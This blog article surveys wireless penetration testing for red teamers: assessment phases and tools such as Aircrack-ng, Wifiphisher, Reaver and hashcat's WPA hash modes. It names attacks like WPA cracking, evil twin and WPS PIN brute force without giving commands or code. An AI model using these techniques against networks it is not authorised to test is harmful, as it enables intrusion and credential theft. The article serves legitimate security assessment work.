Penetration testing

Red Teaming: Main tools for wireless penetration tests

March 22, 2022 by Pedro Tavares

Nowadays, wireless networks are everywhere, connecting people, services, computers in a network etc. To evaluate the security of these kinds of networks and devices, in this article, we need to understand the overall process of a wireless assessment and the most popular tools often used by red teaming professionals.

How do you perform wireless assessments?

There are two topics everyone should be concerned about when executing a wireless assessment, namely: being familiarized with the test approach and knowing the right tools.

1. Be familiar with the different Wi-Fi devices

Although many different devices exist, understanding how the Wireless protocol works and its weaknesses could be many times the key to success. 

2. Ensure you are collecting the fingerprinting of your scope

Planning a well-conducted scanning is one of the most critical steps during a red teaming assessment. The same approach should be taken into account within the wireless landscape. All the information about the target scope needs to be collected, including SSIDs, Wi-FI ranges, networks segmentation, packet examination, RF signal leakage, encryption key and password strength etc. 

3. Exploitation time

After collecting all the needed information, you can prepare the assessment and exploit the targets. For example, brute-force routers with leakage or weak credentials, cracking WPA security, setting up a captive portal testing, deploying rogue ap, finding vulnerabilities between different wireless networks, and identifying devices that shouldn’t be addressed by default. For instance, Evil Twin attack potential and WPA Enterprise misconfigurations are also common attack vectors within this context.

4. Reporting everything

Document all the steps you concluded, and be detailed in listing each finding and how to reproduce it.

The most popular tools for wireless penetration testing

Aircrack

This is a suite of tools to perform Wi-Fi network assessments. The tools focus on different security layers such as packet capture, replay attacks, deauthentication, fake access points, and packet injection. On the other hand, checking Wi-Fi cards and drives capabilities are also available, as is a cracking module for WEP, WPA PSK (WPA 1 and 2).

URL: https://www.aircrack-ng.org/

Airsnort

AirSnort is a WLAN tool capable of cracking encryption keys on 802.11b WEP networks. AirSnort monitors transmissions, computing the encryption key when enough packets have been gathered.

URL: https://sourceforge.net/projects/airsnort/

Kismet

This is a wireless network and device detector. It acts as a sniffer, wardriving tool, and wireless intrusion detection framework. Kismet also works with Wi-Fi and Bluetooth interfaces, radio software and other capture hardware.

URL: https://www.kismetwireless.net/

Wifiphisher

Wifiphisher is a mature tool within the wireless landscape. This tool is a rogue access point framework that creates a MiTM agent between wireless clients by performing targeted Wi-Fi association attacks.

URL: https://github.com/wifiphisher/wifiphisher

Wireshark

Wireshark is an indispensable tool when talking about network packets. It is a network protocol analyzer and organizes all the captured traffic by protocol. This tool is a swiss army knife! More details can be accessed on the official page.

URL: https://www.wireshark.org/

Reaver

Reaver is a tool that implements a brute force mechanism against Wi-Fi Protected Setup (WPS) registrar PINs to recover WPA/WPA2 passphrases.

URL: https://github.com/t6x/reaver-wps-fork-t6x

Cracking WPA/WPA2 with hashcat

Hashcat is an advanced password recovery tool. In detail, it supports five unique modes of attack for over 300 highly-optimized hashing algorithms. Hashcat supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and macOS. Another interesting part is the possibility of enabling distributed password cracking to accelerate the cracking process. 

Within the wireless context, the following hash modes can be used for capturing and filtering WPA handshake output:

22000 | WPA-PBKDF2-PMKID+EAPOL

22001 | WPA-PMK-PMKID+EAPOL

More details about this topic here.

URL: https://github.com/hashcat/hashcat

 

Sources

Posted: March 22, 2022
Pedro Tavares
View Profile

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and a Security Evangelist. He is also Editor-in-Chief of the security computer blog seguranca-informatica.pt. In recent years, he has invested in the field of information security, exploring and analyzing a wide range of topics, such as malware, reverse engineering, pentesting (Kali Linux), hacking/red teaming, mobile, cryptography, IoT, and security in computer networks. He is also a Freelance Writer.